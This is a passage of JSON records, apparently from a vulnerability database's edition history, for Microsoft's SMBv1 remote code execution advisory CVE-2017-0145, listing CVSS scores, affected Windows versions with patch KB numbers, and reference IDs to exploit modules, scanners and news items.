"KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T04:52:34", "differentElements": ["msAffectedSoftware"], "edition": 46}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-16T11:28:55", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-14T04:52:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-14T04:52:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210720", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB3213986", "KB4012213", "KB4012606", "KB4012215", "KB3212646", "KB3205409", "KB4012212", "KB4013198", "KB4012217", "KB4012216", "KB4014077", "KB4012598", "KB4013429", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit 
Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T11:28:55", "differentElements": ["msAffectedSoftware"], "edition": 47}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-16T12:44:29", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012606", "KB4012214", "KB3213986", "KB3212646", "KB4012212", "KB4012213", "KB3210720", "KB4013198", "KB3205401", "KB4014077", "KB4013429", "KB3177186", "KB4012217", "KB3210721", "KB4012215", "KB4012598", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": 
"KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T12:44:29", "differentElements": ["msAffectedSoftware"], "edition": 48}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that 
the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, 